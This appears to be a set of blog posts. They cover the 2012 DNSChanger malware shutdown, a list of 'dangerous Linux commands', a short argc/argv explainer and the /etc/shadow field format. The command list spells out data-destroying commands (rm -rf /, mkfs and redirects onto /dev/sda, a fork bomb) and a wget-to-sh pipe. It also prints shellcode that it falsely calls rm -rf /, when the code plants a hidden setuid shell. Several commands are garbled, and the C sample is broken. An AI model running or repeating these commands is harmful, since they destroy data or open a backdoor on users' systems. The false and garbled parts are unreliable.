DNS Virus (Internet dooms day)

On Monday,9 july 2012, the FBI turned off servers that had allowed thousands of malware-stricken computers to continue using the Internet. The personal computers – both Windows PCs and Macs – are corrupted by a virus known as DNSChanger. Without the servers, the machines wouldn’t know how to locate websites and send email.

Years ago, an Estonian company Rove Digital created a malware that managed to trick millions of people into installing the DNSChanger software, which changed certain computer settings. With the change, victim’s computer went to a rogue server rather than a legitimate one at their company or Internet service provider. From there, the scammers were able to send victims to websites containing rogue ads from which they profited.

How were the servers supposed to function?

Databases known as domain name servers translate Internet addresses such as “ap.org” into a series of numbers your computer needs to locate other Internet-connected machines. Think of it as the Internet’s version of directory assistance for telephone numbers. If you need the number for Acme’s Flowers, you call “411” to ask for it.

How the scam worked?

In the simplest terms, think of it as “411” calls that were rerouted to a directory-assistance service operated by the scammers. You call it to ask for Acme’s Flowers, but the service gives you the number for a flower shop run by the mob. The shop still fulfills the order, so you don’t suspect anything, but it might use stolen flowers and baskets.

According to federal authorities, there were variations on how the scammers profited.

In some cases, only the ads were changed. For example, authorities say, people who went to ESPN’s website saw an ad for a timeshare business rather than the Dr. Pepper ad that was supposed to be there. In such cases, those people were still going to ESPN’s website. Normally, your computer would grab the ad displayed on ESPN from a separate, legitimate ad-placement company. Authorities say the affected computers were tricked into grabbing the scammers’ ad instead.

In other cases, authorities say, people searching through Google or Yahoo were sent to a fake search engine. They got search results that looked like Google’s or Yahoo’s but contained links to unauthorized sites. For example, people trying to reach the IRS site instead got H&R Block’s, without the tax preparer’s knowledge. Authorities say scammers got payments for referrals.

The FBI said the scam netted at least $14 million.

If this has been going on for years, why did it become a problem Monday?

Authorities busted the ring in November and arrested six suspects. The rogue databases were replaced with legitimate ones, but they were always meant to be temporary and did nothing to change the settings on individual computers. In other words, the troubled computers were still looking for databases at the rogue locations, but legitimate databases were set up at those rogue locations.

Those databases were turned off Monday with the expiration of a court order, so infected computers are now looking for databases that don’t exist. Without the information, computers don’t know where to find websites.

Continuing the phone analogy, the “411” calls during the transition period didn’t go to the usual directory-assistance service but one operated on behalf of the FBI. You’d get the correct Acme’s Flowers, not the mob operation. Since the temporary service shut down Monday, “411” calls essentially go to a disconnected line.

Are the infected computers now offline?

Not really. If your computer is corrupted, you can still reach websites if you know their numeric Internet address. But chances are, you don’t. So you are effectively offline. Imagine if all your contacts in your cellphone got wiped out. How many people would you be able to call?

In addition, some service providers are redirecting traffic on the back end so that they still reach legitimate databases.

How many computers are affected?

At the time of the arrests in November, the FBI said about 4 million computers had the rogue settings, including about 500,000 in the US Some were home computers, while others were on employees’ desks at major businesses and government agencies, including NASA. Many of the computers had been fixed since then, with the settings restored to reach normal, permanent databases. As of late Sunday, just before the temporary databases were turned off, the FBI believes about 211,000 were still affected worldwide, including 41,800 in the US.

What has been done to fix the computers infected with DNSChanger?

For months, the FBI and private companies have been sending general warnings about the deadline. Some Internet service providers and the social-networking service Facebook Inc. also have been directly notifying people they believe still have infected computers. Some Facebook users, for instance, got a message on their screen warning them that access to websites, emails and chat would end Monday if they didn’t correct the problem. They were given a website with more information on detecting and fixing the problem.

Nonetheless, many computers remained infected. Many users didn’t understand what was going on, let alone how to fix the problem. And some thought the warnings themselves were scams, or at least an effort by the government to spy on them.

What happens if my computer is still infected?

Several security companies have free tools to scan your computer and remove this and other threats. Chances are if you are reading this on the Internet after Monday,9 july 2012, your computer is OK. You can go to http://www.dns-ok.us to make sure. Even if your computer is clean, it’s a good idea to have it scanned regularly or install security software that does it automatically on a regular basis.

More details on fixing your computer can be found here: http://www.dcwg.org/fix .




7 Most Dangerous Commands Of Linux !!

1. rm-rf /
This is a  powerful command which deletes all files in the root directory “/” .Watch this video to know the power of this command

2. Code:

char esp [] __attribute__ ((section (. “text”))) / * esp
release * /
= “\ Xeb \ x3e \ x5b \ x31 \ xc0 \ x50 \ x54 \ x5a \ X83 \ xec \ x64 \ x68?
“\ Xff \ xff \ xff \ xff \ x68 \ xdf \ xd0 \ xdf \ xd9 \ x68 \ x8d \ x99?
“\ Xdf \ x81 \ x68 \ x8d \ x92 \ xdf \ xd2 \ x54 \ x5e \ xf7 \ x16 \ xf7?
“\ X56 \ X04 \ xf7 \ X56 \ x08 \ xf7 \ X56 \ x0c \ X83 \ xc4 \ x74 \ X56?
“\ X8d \ x73 \ x08 \ X56 \ x53 \ x54 \ X59 \ xb0 \ x0b \ xcd \ x80 \ x31?
“\ Xc0 \ x40 \ xeb \ xf9 \ xe8 \ xbd \ xff \ xff \ xff \ x2f \ x62 \ x69?
“\ X6e \ x2f \ x73 \ x68 \ x00 \ x2d \ x63 \ x00?
“Cp-p / bin / sh / tmp / .beyond; chmod 4755
/ tmp / .beyond; ”

This is the hex version of [rm-rf /] that can deceive even those not experienced users of GNU/Linux

3. mkfs.ext3 / dev / sda

This will reformat all the files on the device that is mentioned after the mkfs command.

4. :(){:|:&};:

Known as fork bomb, this command to run a large number of processes until the system freezes. It can lead to data corruption.

5. any_command> / dev / sda

This command causes total loss of data, in the partition that is mentioned in command

6. http://some_untrusted_source wget-O-| sh

Never download untrusted sources and below are implemented, they may be malicious codes

7. mv / home / yourhomedirectory / * / dev / null

This command will move all the files in your home to a place that does not exist.

[Ref: http://www.linuxpromagazine.com/online/news/seven_deadliest_linux_commands?category=13447]

Explaining (int argc, char * argv[])

You all have often came across this term while going through a c or c++ code.I just want to explain this in brief especially for the newbies who find it difficult to understand this concept.

Here argc represents the number of arguments(command line argument) and argv is the argument vector pointing it.
Suppose I am compiling a c code ‘test.c’ so what i give at command line is

$ gcc test.c -o test
$ ./test                                                           //for running executable file test

so here argc=1 as no of command line arguments here is one and argv[0]=./test

similarly if executable is run as

$ ./test <arg1> <arg2>

then here argc=3 and argv[0]=./test ,argv[1]=arg1 and argv[2]=arg2

Below is the c code i have written try it for better understanding of this concept.Have lots of fun with c codes 🙂

main(int argc, char* argv[])
int i;
printf("argc = %d\n", argc);
for (i = 0; i < argc; i++)
printf("argv[%d] = %s\n", i, argv[i]);

Some Details on Format of /etc/shadow

Hi everyone,

I often used to wonder about the format of /etc/shadow file and with little research I came across some usefull information about it.So basically here I am going to list some of the details about the format of /etc/shadow file do read it carefully hope you will enjoy it 🙂
Test format


All fields are separated by a colon(:) symbol

User name : It is your login name
Password: It your encrypted password. The password should be minimum 6-8 characters long including special characters/digits
Last password change (lastchanged): Days since Jan 1, 1970 that password was last changed
Minimum: The minimum number of days required between password changes i.e. the number of days left before the user is allowed to change his/her password
Maximum: The maximum number of days the password is valid (after that user is forced to change his/her password)
Warn : The number of days before password is to expire that user is warned that his/her password must be changed
Inactive : The number of days after password expires that account is disabled
Expire : Days since Jan 1, 1970 that account is disabled i.e. an absolute date specifying when the login may no longer be used

The last 6 fields provides password aging and account lockout features.Password field must be filled.